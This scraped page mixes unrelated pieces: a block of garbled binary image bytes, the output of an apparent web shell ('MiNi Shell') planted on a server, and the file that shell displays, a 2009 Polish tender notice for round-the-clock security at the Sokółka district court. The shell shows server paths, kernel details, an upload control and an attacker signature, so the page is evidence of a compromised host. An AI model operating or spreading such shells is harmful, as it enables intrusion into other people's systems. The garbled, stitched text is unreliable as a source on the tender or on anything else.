JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090320/71198-N-2009.html

<p class="kh_header"><b>Sokółka: Całodobowa ochrona osób i mienia budynku Sądu Rejonowego w Sokółce.</b><br>
<b>Numer ogłoszenia: 71198 - 2009; data zamieszczenia: 20.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Sokółce , ul. marsz. Józefa Piłsudskiego 7, 16-100 Sokółka, woj. podlaskie, tel. 0-85 711 41 29, faks 0-85 711 41 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokolka.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowa ochrona osób i mienia budynku Sądu Rejonowego w Sokółce..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi całodobowej ochrony osób i 
   mienia budynku Sądu Rejonowego w Sokółce. 
2. Realizacja przedmiotowego zadania: świadczenie usługi całodobowej ochrony
   osób i mienia budynku i posesji Sądu Rejonowego w Sokółce będzie polegała na:
2.1 jednoosobowym całodobowym posterunku na stanowisku monitoringu z obsługą
     istniejącego systemu telewizji dozorowej, systemów napadowych,
     antywłamaniowych i p/pożarowych wraz z obowiązkiem wydawania kluczy do
     pomieszczeń, zamykania i otwierania bram, drzwi wejściowych zgodnie z
     wewnętrznymi zarządzeniami Prezesa Sądu Rejonowego w Sokółce;
2.2 jednoosobowym posterunku w godzinach urzędowania, tj. w poniedziałki od
     7:30 do 18:00, a w pozostałe dni robocze tygodnia od 7:30 do 15:30;
2.3 kontroli ruchu osobowo-materiałowego i podejmowaniu działań w przypadku
     jego naruszenia, w tym na polecenie Prezesa Sądu Rejonowego w Sokółce lub
     organów Policji montaż i obsługa detektorów metalu;
2.4 prowadzeniu dokumentacji ochronnej zgodnie z obowiązującymi przepisami
     (m.in. prowadzenie dziennika dyżurów, wpisywanie informacji o objęciu i
     zakończeniu dyżuru oraz wszystkich zdarzeniach zaistniałych w trakcie 
     pełnienia służby);
2.5 każdorazowym otwieraniu drzwi przeciwpożarowych po wystąpieniu alarmu 
     i uruchamianiu klap oddymiających;
2.6 uzbrajaniu i rozbrajaniu SSWiN w ustalonych godzinach;
2.7 możliwości wsparcia pracownika ochrony przez załogę interwencyjną, w skład
     której wchodzi co najmniej dwóch licencjonowanych pracowników ochrony
     jednolicie umundurowanych;
2.8 zapewnieniu kontroli (co najmniej jednorazowej) tegoż patrolu/załogi
     interwencyjnej w godzinach pomiędzy 22:00 a 6:00 każdego dnia z wpisem
     osób kontrolujących do książki dyżuru;
2.9 podłączeniu systemów alarmowych Sądu Rejonowego w Sokółce do własnej
     stacji monitoringu całodobowego, zapewniając wgląd do bieżących stanów
     systemów alarmowych oraz przeglądanie i generowanie raportów z działania
     systemów;
2.10 zapewnieniu okresowych kontroli telefonicznych gotowości posterunku przez
       całodobowe centrum monitorowania w godzinach pomiędzy 20:00 a 6:00;
2.11 natychmiastowym reagowaniu na wszystkie (nawet telefoniczne) zgłoszenia
       zagrożenia personelu, osób trzecich lub obiektu;
2.12 reagowaniu na zgłoszenia elektronicznych systemów sygnalizacyjnych i 
       wizualizacyjnych (w szczególności p/poż) oraz na zauważone zdarzenia
       mogące mieć wpływ na wystąpienie strat w mieniu (zalanie pomieszczeń,
       uszkodzenie oświetlenia, uszkodzenia zamków, drzwi, samozamykaczy,
       przecieki itp.). Sposób reagowania zostanie określony w planie ochrony
       obiektu;
2.13 kontroli ręcznych ostrzegaczy pożarowych i awaryjnych przycisków wyjścia
       ewakuacyjnego oraz kontroli wszystkich nieuzasadnionych użyć powyższych
       urządzeń (do ujawnienia personaliów osoby dokonującej użycia włącznie);
2.14 w sytuacjach szczególnych - ścisłej współpracy ze służbami publicznymi:
       Policją, Strażą Pożarną, Strażą Miejską, itp.;
2.15 niezwłocznym informowaniu kierownictwa Zamawiającego o 
       nieprawidłowościach, awariach oraz wszystkich okolicznościach mających
       wpływ na stan bezpieczeństwa chronionego obiektu;
2.16 wyposażeniu pracowników ochrony w podstawowe środki przymusu oraz w
       środki łączności bezprzewodowej umożliwiającej wezwanie patrolu, przy czym
       dojazd patrolu nie może trwać dłużej niż 5 minut;
2.17 sporządzeniu planu ochrony w terminie 30 dni od daty podpisania umowy i
       uzgodnienia go z Zamawiającym;
2.18 wykonywaniu czynności, o których mowa w art. 36 ust. 1 Ustawy o ochronie
       osób i mienia (Dz. U. z 2005, Nr 145, poz. 1221), w tym zapewnieniu
       gotowości stosowania środków przymusu, o których mowa w art. 38 ustawy.
3. Szczegółowy opis chronionego obiektu i posesji stanowi Załącznik nr 1 do siwz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Wykonawca potwierdzi spełnienie warunku udziału w postępowaniu, jeżeli wykaże, iż:
1) w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres
    prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co
    najmniej jedną, trwającą co najmniej 12 miesięcy w ramach jednej umowy,
    usługę w zakresie wykonywania całodobowej ochrony osób i mienia obiektów o
    wartości minimum 150.000,00 złotych (brutto) rocznie,
2) osoby, które będą świadczyły usługi ochrony na rzecz Zamawiającego będą
    posiadały licencje I lub II stopnia oraz aktualne poświadczenia bezpieczeństwa
    osobowego (dotyczy osób wytypowanych do ochrony obiektu),
3) dysponuje lub zapewnia stacjonowanie co najmniej jednego patrolu/załogi
    interwencyjnej na terenie miasta Sokółki;
1.3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
     zamówienia;
1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na
   podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału
   w postępowaniu, na podstawie złożonego wraz z ofertą oświadczenia o nie
   podleganiu wykluczeniu z udziału w postępowaniu i na podstawie złożonych wraz
   z ofertą dokumentów żądanych przez Zamawiającego. 
   Ocena spełnienia wymaganych warunków udziału w postępowaniu będzie 
   odbywała się wg kryterium spełnia/nie spełnia poszczególne warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca winien dostarczyć wraz z ofertą:
1.1 Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu 
     określonych w art. 22    ust. 1 pkt 1-3 ustawy - na formularzu zgodnym z
     treścią Załącznika nr 3 do siwz.
1.2 Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24
     ust. 1 i ust. 2 ustawy -na formularzu zgodnym z treścią Załącznika nr 4 do siwz.
1.3 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
     ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
     rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie
     wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.4 Aktualna koncesja MSWiA na prowadzenie działalności gospodarczej w zakresie
     dotyczącym przedmiotu zamówienia.
1.5 Informacja o doświadczeniu zawodowym Wykonawcy - na formularzu zgodnym
     z treścią Załącznika nr 5 do siwz. Do informacji winne być dołączone
     dokumenty potwierdzające, że usługi te zostały wykonane należycie.
1.6 Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia - na
     formularzu zgodnym z treścią Załącznika nr 6 do siwz. Do wykazu winne być
     dołączone aktualne licencje I lub II stopnia oraz aktualne poświadczenia
     bezpieczeństwa osobowego osób wyszczególnionych w niniejszym wykazie.
1.7 Oświadczenie Wykonawcy, iż dysponuje lub zapewnia stacjonowanie co
     najmniej jednego patrolu/załogi interwencyjnej na terenie miasta Sokółka - na
     formularzu zgodnym z treścią Załącznika nr 7 do siwz.
1.8 Pełnomocnictwo (jeżeli dotyczy).
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
    Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 10.4
    składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym
    ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie 
    otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie orzeczono wobec
    niego zakazu ubiegania się o zamówienie.
2.1 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma
     siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa
     w pkt 2, zastępuje się je dokumentem zawierającym oświadczenie złożone
     przed notariuszem, właściwym organem sądowym, administracyjnym albo 
     organem samorządu zawodowego lub gospodarczego odpowiednio kraju
     pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce
     zamieszkania.
3. Oferta wspólna.
3.1 Podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do
     reprezentowania wszystkich Wykonawców wspólnie ubiegających się o
     udzielenie zamówienia.
3.2 W przypadku oferty składanej przez Wykonawców występujących wspólnie o
     udzielenie zamówienia, czyli w szczególności konsorcja i spółki cywilne,
     dokumenty wymienione odpowiednio w pkt 1.3 i 1.4 składa każdy z 
     Wykonawców oddzielnie. Natomiast oświadczenie, o którym mowa w pkt 1.1 i
     pkt. 1.2 Wykonawcy składają odpowiednio np. jako oświadczenie łączne lub 
     oddzielne oświadczenia.
3.3 Przed podpisaniem umowy Wykonawcy składający ofertę wspólną będą mieli
     obowiązek przedstawić Zamawiającemu umowę o wspólnej realizacji zamówienia
     (umowę spółki, konsorcjum), zawierającą co najmniej:
3.3.1 zobowiązanie do realizacji przedmiotu zamówienia
3.3.2 określenie zakresu działania poszczególnych stron
3.3.3 czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący
       realizację zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sokolka.sr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać na pisemny wniosek Wykonawcy, osobiście w Sądzie Rejonowym w Sokółce, ul. Piłsudskiego 7, 16-100 Sokółka, pokój nr 101 lub drogą przesyłki pocztowej. Koszt SIWZ- bezpłatna..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 10:00, miejsce: Sąd Rejonowy w Sokółce, ul. Piłsudskiego 7, 16-100 Sokółka, pokój nr 101 (pokój Kierownika Finansowego)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja o sposobie porozumiewania się z Zamawiającym:
1. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawca mogą przekazywać pisemnie i faksem.
2. Jeżeli Zamawiający lub Wykonawca przekazują dokumenty, o których mowa w pkt. 1 faksem, każda ze stron na żądanie drugiej niezwłocznie powiadomi fakt ich otrzymania.
3. Ze strony Zamawiającego osobą uprawnioną do kontaktowania się z Wykonawcami jest Iwona Gudalewska fax (085) 711-41-29 wew. 379.

Creat By MiNi SheLL
Email: jattceo@gmail.com